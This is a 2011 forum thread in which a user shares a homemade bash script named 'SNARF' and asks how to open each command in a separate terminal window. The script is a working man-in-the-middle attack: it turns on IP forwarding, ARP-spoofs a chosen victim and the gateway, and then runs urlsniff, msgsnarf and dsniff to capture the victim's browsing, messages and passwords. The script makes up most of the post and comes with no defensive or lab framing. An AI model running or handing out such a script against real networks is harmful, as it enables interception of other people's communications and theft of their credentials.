rufus777 Posted April 24, 2011 Share Posted April 24, 2011 Hay! :) I do not have a code for New Windows Shell? can anyone help me? I've tried gnome-terminal, but it does not work so well ... hehe, I realize that I'm noob but but ..... :P echo "Man in the middel" echo " SNARF " echo " by " echo " Rufus777 " echo -n "Wi-fi: " read -e WIFI echo -n "Gateway IP: " read -e ROUTER echo -n "Target IP: " read -e VICTIM echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i $WIFI -t $VICTIM $ROUTER & arpspoof -i $WIFI -t $ROUTER $VICTIM & gnome-terminal -x urlsniff -i wlan0 & gnome-terminal -x msgsnarf -i wlan0 & gnome-terminal -x dsniff -i wlan0 & Quote Link to comment Share on other sites More sharing options...
rufus777 Posted April 24, 2011 Author Share Posted April 24, 2011 pøøøøøøøøøøøø!!!!! hehe, Now I understand!! Sorry!!! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.